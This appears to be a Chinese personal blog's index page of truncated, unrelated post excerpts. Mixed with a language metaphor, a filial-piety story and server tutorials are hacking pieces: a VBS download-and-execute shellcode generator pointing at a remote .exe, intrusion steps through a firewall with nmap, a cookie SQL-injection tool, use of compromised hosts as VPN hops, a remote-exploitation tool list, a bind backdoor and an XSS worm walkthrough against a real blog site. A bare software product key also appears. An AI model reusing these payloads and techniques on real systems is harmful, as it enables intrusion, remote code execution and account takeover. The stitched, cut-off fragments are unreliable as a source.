jahn的专栏

如果编程语言也是一条船程序员与编程语言一直都被热烈讨论的话题。这里不妨引入一个新的思考方向，如果将编程语言比作一条船，那么程序员又将扮演一个什么样的角色？是载舟的水，还是坐船的人？Turing图灵无疑是一条独木舟，它很小并且需要纯手工驱动。这是一条适合初学者的“船”。JavaJava 是一条货船。它的体积庞大、承载量大，非常企业级。不过在运行一个项目时，操作并不那么顺手。PerlPerl是一艘拖船

树欲静而风不息。 子欲养而亲不在。 乃劝为人之子女者。应当及时事亲尽孝。则不致思欲孝养父母。而父母已亡。追忏 已晚矣。 一篇感人的文章 -- 做人子女者必看!! 媳妇说： "煮淡一点妳就嫌没有味道，现在煮咸一点妳却说咽不下，妳究竟 怎么样？" 母亲一见儿子回来，二话不说便把饭菜往咀里送。 她怒瞪他一眼。 他试了一口，马上吐出来，儿子说： " 我不是说过了吗，妈有病不能吃太咸!" 那好！妈是你的，以

2008年2月27日,百度安全中心正式上线, 百度安全中心是和金山毒霸合作的一个产品。先试用下.以前用过一个国外的一个测试系统风险的,好象是要安装的.并且分的也比较细，只是都是英语，不怎么容易明白，相信百度安全中心对大家是一个不错的选择。下图就是百度安全中心的界面，还有一个百度的二级域名。我们在使用百度安全中心的时候它会提示安装一个插件。1=780) window.open(http://bbs

                      百度真的没有编辑一个乙肝新闻放入互连网百度，不能只靠关键字定位，一个乙肝的新闻有必要放到互联网新闻里吗，建议即时 说关键字收集也要审核下，这肯定不是第一次出现错误，有损百度在国人眼中的形象。 

    北京今天又下了一场雪，也不是很冷。不过上午下的挺大，不过时间挺短。还没等落地上。就已经没了，打雪仗的想法也落空了，老天也不让玩的开心点，真是很无奈，在我住的宿舍，一天到晚都看不到阳光，结果早上一睁眼八点二十，速度的洗脸，飞一般的速度跑到公司，明明说我的表才八点二十九，一打卡都八点三十二了，不仅是早饭没吃，还迟到了2分钟。     天天上班也没什么累的，可是最近老觉的象缺点什么，应该是在技术

FreeBSD 6.2快速架设网站服务器教程（Apache2.2.X+MySQL5.X.X+ PHP5.2.X+ ZendOptimizer-3.2.X）

Redhat Fedora Core 6 Linux安装流程   世界网络教研室整理

       Core Security Technologiess - CoreLabs Advisory            http://www.coresecurity.com/corelabs    VLC Activex Bad Pointer Initialization Vulnerability*Advisory Information*Title: VLC Activex B

本文就是想对装上了防火墙的主机，进行入侵攻击的大概思路小结一下。  首先当然是用扫描器对这台服务器（以下简称主机A）进行常规的扫描，得到初步的信息。再用nmap -sS IP -P0 -p 139 ，透过防火墙查看是否开有139端口。从上面得到的信息我们可以简单的判断到：主机A的系统是什么，装有防火墙的话，一般是只允许80端口开放的。如果能够泄漏asp源文件，当然是最好不过的了，但是一般难得遇到。

 来源：vbs空间exeurl = InputBox( "请输入下载执行exe的地址：", "输入","http://np.icehack.com/np.exe" )code by NetPatchif exeurl code="/x43/x43/x43/x43/x43/x43/xe9/xa3/x00/x00/x00/x5f/x64/xa1/x30/x00/x00/x00/x8b/x40/x

作者：职业欠钱来源：职业欠钱&zj1244共用的public Blog/*cookies 注入也加速 工具 PHP版by 职业欠钱最近遇到一个挂了防注入的东东，COOKIE注入可行，不过手工注入太辛苦了，便四处寻找加速工具mika的工具依赖于SQL 错误开启的模式，而我遇到的这个是不显示错误信息的只能够盲注了。曾经找到一个ASP版的加速工具，其原理是将GET变量放到COOKIE里，然后调用XM

NetPatch此文已经发于黑客手册第十一期上一期写了一个VBS的注入脚本，这次给大家带来两个脚本，希望小菜们能喜欢。一．挑选速度快的肉鸡做VPN。当自己从小菜鸟转型为老菜鸟时，就懂得考虑在玩Hacking的同时也要尽量保证不暴露自己。万事，安全第一嘛！不然都不知道哪天玩着玩着就被警察叔叔带去喝茶了^_^ 。因此，作为老菜鸟的我们，要学会在Hacking时，多用VPN+终端等跳板措施来保护自己，尽

本文,已发于《黑客手册》07年10月刊平常我们遇到有注入漏洞一类的网站大部分人都是用NBSI Or 阿D一类的注射工具。但有的站点的注射点很难构造，或者说注射语句比较特殊。如果用手工去注射的话，费时又费力！但自己写针对性的工具的话，对一些刚入门不久或不会编程的朋友来说，实在是一件很痛苦的事情。因此今天NP给大家带来的文章就是讲如何用简单的VBS脚本来打造我们所要的注射工具。在您继续看这篇文章之前，

jk6jc-p7p7h-4hrfc-3xm7p-g33hm 

webadv：针对iis+sp3的溢出成功率很高(溢出后system权限!) 　　ipscan：大范围网段快速ipc猜解 　　svc：远程安装/删除Win2k服务 　　3389.vbs：远程安装Win2k终端服务不需i386 　　arpsniffer：arp环境sniffer(需要Winpcap2.1以上) 　　ascii：查询字符和数字ascii码(常用来对url编码用以躲避

网络上曾经有过关于跨站脚本攻击与防御的文章，但是随着攻击技术的进步，以前的关于跨站脚本攻击的看法与理论已经不能满足现在的攻击与防御的需要了，而且由于这种对于跨站脚本认识上的混乱，导致现在很多的程序包括现在的动网都存在着跨站脚本过滤不严的问题，希望本文能给写程序的与研究程序的带来一点思路。还是首先看看跨站脚本漏洞的成因，所谓跨站脚本漏洞其实就是Html的注入问题，恶意用户的输入没有经过严格的控制进入

 Bind后门.体积仅有629字节!!!!支持多用户登录,多线程支持!!!屏蔽了.安装,过主防等危害功能...主页:www.eviloctal.comEmail:Anskya[AT]Gmail.comAnskya 加入E.S.T第一个作品,请大家多多支持和帮助我感谢曾经帮助过和支持过我的朋友们,谢谢大家!!!啊哈哈～不好意思实在不知道说什么好...最近捣鼓PE融缩技术...nasm的编译器

完整XSS wrom入侵流程不说废话，且看怎么实现，我先拿SOHU BLOG做示范.1.测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,//前是真正的空格),在个人档案处看过滤了哪些.’’;:!--"=&#{()} //结果’’;:!--"=&#{()} // (&后是amp,论坛过滤了)过滤了"javascript","&"和"/"这两个

  批注 跑马灯 ...普通卷动 ...滑动 ...预设卷动 ...来回卷动 ...向下卷动 ...向上卷动 向右卷动 向左卷动 ...卷动次数 ...设定宽度 ...设定高度 ...设定背景颜色 ...设定卷动距离 ...设定卷动时间 字体效果 ...标题字(最大) ...标题字(最小) ...粗体字 ...粗体字(强调) ...斜体字 ...斜体字(强调) ...斜体字(表示定义) ...底